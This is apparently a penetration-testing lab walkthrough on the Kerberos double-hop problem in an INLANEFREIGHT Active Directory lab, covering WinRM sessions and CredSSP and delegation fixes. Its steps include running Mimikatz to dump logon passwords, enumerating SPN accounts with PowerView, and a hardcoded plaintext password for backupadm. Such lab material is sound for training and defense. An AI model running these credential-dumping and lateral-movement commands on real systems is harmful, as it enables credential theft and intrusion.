21.Kerberos Double Hop Problem

Overview

The Kerberos "Double Hop" problem occurs when a user authenticates to a remote system using Kerberos, but their credentials cannot be forwarded to a second system from that remote session. This is a common issue in scenarios involving WinRM, PowerShell remoting, and multi-tier authentication setups.

Scenario

A user attempts to connect from a local machine to DEV01 using PowerShell remoting. They then attempt to access a third system from DEV01, but authentication fails due to the Kerberos constraint.

Steps to Reproduce

  1. Establish a WinRM Session to DEV01

    Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm

  2. Change Directory

    cd 'C:\Users\Public\'

  3. Run Mimikatz to View Credentials (Requires Privileged Access)

    .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

  4. List Processes for a Specific User

    tasklist /V | findstr backupadm

  5. Check Kerberos Ticket Cache

    klist

  6. Import PowerView Module

    import-module .\PowerView.ps1

  7. Enumerate Domain Users with SPNs

    get-domainuser -spn

  8. Create a Secure Credential Object

    $SecPassword = ConvertTo-SecureString '!qazXSW@' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)

  9. Query Domain Users with SPNs Using Credentials

    get-domainuser -spn -credential $Cred | select samaccountname

  10. Register a New PSSession Configuration to Enable Credential Delegation

    Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential INLANEFREIGHT\backupadm

  11. Restart WinRM Service

    Restart-Service WinRM

  12. Enter PSSession Using the Registered Configuration

    Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess

Solution: CredSSP Authentication

To bypass the Kerberos double-hop issue, enable CredSSP Authentication, which allows credentials to be delegated securely.

Steps to Enable CredSSP

  1. On the Client Machine

    Enable-WSManCredSSP -Role Client -DelegateComputer DEV01

  2. On the Remote Server (DEV01)

    Enable-WSManCredSSP -Role Server

  3. Run PowerShell Remoting with CredSSP

    Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -Authentication CredSSP

  4. Verify CredSSP Configuration

    Get-WSManCredSSP

Alternative Solution: Kerberos Constrained Delegation (KCD)

Instead of using CredSSP, Kerberos Constrained Delegation (KCD) can be configured for more secure credential forwarding. This requires modifying Active Directory settings to allow a service account to delegate authentication to specific services.

Conclusion

The Kerberos "Double Hop" issue is a common obstacle in multi-hop authentication scenarios. Enabling CredSSP or configuring Kerberos Constrained Delegation can help mitigate this issue while maintaining security.

Previous20.Privileged AccessNext22.Bleeding Edge Vulnerabilities

Last updated